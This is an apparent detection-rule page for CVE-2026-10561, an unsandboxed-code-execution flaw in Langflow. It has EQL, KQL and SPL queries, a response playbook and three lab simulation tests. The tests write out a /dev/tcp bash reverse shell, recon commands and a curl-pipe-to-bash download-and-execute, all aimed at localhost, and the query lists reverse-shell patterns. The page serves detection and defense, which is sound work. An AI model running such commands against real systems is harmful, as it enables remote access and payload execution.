CVE-2026-10561 Elastic Security · Elastic

Detect Langflow PythonREPLComponent Unsandboxed Code Execution (CVE-2026-10561) in Elastic Security

Detects exploitation of CVE-2026-10561, a critical (CVSS 9.9) remote code execution and privilege escalation vulnerability in Langflow versions prior to 1.10.1. The PythonREPLComponent executes user-supplied Python code without a sandbox, allowing any authenticated user to run arbitrary code with the privileges of the Langflow process. This detection looks for the Langflow server process (uvicorn/python running langflow) spawning unexpected child processes (shells, interpreters, reconnaissance binaries, reverse-shell patterns) and for suspicious API activity against the flow build/run endpoints that carry PythonREPLComponent payloads.

MITRE ATT&CK

Tactic
Execution Privilege Escalation

Elastic Detection Query

Elastic Security (Elastic)
eql
process where event.type == "start" and
  process.parent.name in ("python","python3","uvicorn","gunicorn") and
  (process.parent.command_line : "*langflow*" or process.parent.command_line : "*uvicorn*") and
  process.name in ("sh","bash","zsh","dash","nc","ncat","curl","wget","whoami","id","uname","powershell.exe","cmd.exe") and
  process.command_line : ("*-c*","*/dev/tcp*","*base64*","*socket*","*subprocess*","*os.system*","*exec(*","*reverse*","*bash -i*")
critical severity high confidence

EQL sequence flagging the Langflow Python parent spawning suspicious children with injected-code command lines.

Data Sources

Elastic DefendAuditbeat

Required Tables

logs-endpoint.events.process-*

False Positives & Tuning

  • Intentional subprocess-spawning Langflow components
  • Operator debug shells from the service account
  • Startup/entrypoint utility invocations

Other platforms for CVE-2026-10561


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Langflow PythonREPL reverse shell simulation

    Expected signal: Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.

  2. Test 2Langflow PythonREPL recon command execution

    Expected signal: python3 process spawning sh -c invoking whoami/id/uname.

  3. Test 3Langflow PythonREPL download-and-execute

    Expected signal: python3 parent spawning bash/curl child with piped execution command line.


Response Playbook

Triage

  1. Confirm the Langflow version on the affected host (`pip show langflow`); versions < 1.10.1 are vulnerable to unsandboxed PythonREPLComponent execution.
  2. Correlate the alerting child process with the Langflow access logs to identify the authenticated user/API key that submitted the flow run or build request.
  3. Review the parent Langflow process command line and the spawned child command line to determine whether the execution is a known custom component or injected attacker code (reverse shell, recon, download-and-execute).
  4. Determine whether the spawned process achieved outbound network connectivity or wrote new executables/persistence artifacts.

Containment

  1. Isolate the affected Langflow host from the network to stop any active reverse shell or lateral movement.
  2. Revoke the API key / session token of the authenticated user that triggered the PythonREPLComponent execution and disable the account pending investigation.
  3. Upgrade Langflow to >= 1.10.1 (which removes unsandboxed PythonREPLComponent execution) or, as an interim measure, restrict/disable the Python REPL component and place the service behind strict network ACLs.

Evidence Collection

  1. Capture the full Langflow application logs, uvicorn/gunicorn access logs, and the flow JSON definitions submitted around the alert time.
  2. Preserve process execution telemetry (parent/child, command lines, hashes) and any files written by the spawned process.
  3. Snapshot the host or container filesystem and collect network connection logs for the Langflow service account.

Escalation Criteria

  • !Escalate to incident response if the spawned child established an outbound/reverse connection or executed credential-access or recon commands.
  • !Escalate if evidence shows privilege escalation beyond the Langflow service account or lateral movement to other hosts.
  • !Escalate if the triggering account is unexpected, shared, or shows signs of compromise (impossible travel, brute force precursors).

Investigation Guide

Related Techniques

Forensic Artifacts

  • >Langflow/uvicorn access logs showing POST requests to flow build/run endpoints (e.g. /api/v1/build, /api/v1/run) around the alert time
  • >Flow JSON definitions containing a PythonREPLComponent node with attacker code
  • >Process execution records for children of the Langflow Python process, plus any files/persistence they created

Tuning Guidance

Enumerate legitimate custom Langflow components that intentionally spawn subprocesses and allowlist their specific command-line patterns and service-account context. Scope the detection to hosts/containers known to run Langflow to reduce noise, and tighten the suspicious-child list to the binaries never expected in your deployment.


Hunting Queries

Baseline and hunt for any shell/recon children of the Langflow server process across the fleet.

Hunting — KQL
kql
DeviceProcessEvents | where InitiatingProcessCommandLine has "langflow" | where FileName in~ ("sh","bash","nc","ncat","curl","wget","whoami","id") | summarize count() by DeviceName, FileName, ProcessCommandLine, bin(Timestamp, 1h)
Hunting — SPL
spl
index=edr (parent_process=*langflow* OR parent_process=*uvicorn*) (process_name=sh OR process_name=bash OR process_name=nc OR process_name=curl OR process_name=whoami) | stats count by host, process_name, process

Atomic Red Team Tests

Test 1 Langflow PythonREPL reverse shell simulation
linux

Simulates injected PythonREPLComponent code that launches a bash reverse shell from the Langflow process context (lab only).

Command

bash
python3 -c "import subprocess; subprocess.run(['bash','-c','bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'])" &

Cleanup

bash
pkill -f '/dev/tcp/127.0.0.1/4444' 2>/dev/null; true

Expected Telemetry

Process launch: python3 parent spawning bash child with /dev/tcp reverse-shell command line.

Expected Detection

KQL/SPL/EQL rules match the python parent spawning bash with /dev/tcp pattern.

Test 2 Langflow PythonREPL recon command execution
linux

Simulates attacker running host reconnaissance via unsandboxed Python code.

Command

bash
python3 -c "import os; os.system('whoami; id; uname -a')"

Cleanup

bash
echo 'no cleanup required'

Expected Telemetry

python3 process spawning sh -c invoking whoami/id/uname.

Expected Detection

Rules match python parent spawning recon binaries via os.system.

Test 3 Langflow PythonREPL download-and-execute
linux

Simulates injected code that downloads and runs a second-stage payload.

Command

bash
python3 -c "import subprocess; subprocess.run(['bash','-c','curl -s http://127.0.0.1:8000/x.sh | bash'])"

Cleanup

bash
rm -f /tmp/x.sh 2>/dev/null; true

Expected Telemetry

python3 parent spawning bash/curl child with piped execution command line.

Expected Detection

Rules match python parent spawning curl/bash with download-and-execute pattern.

Related Detections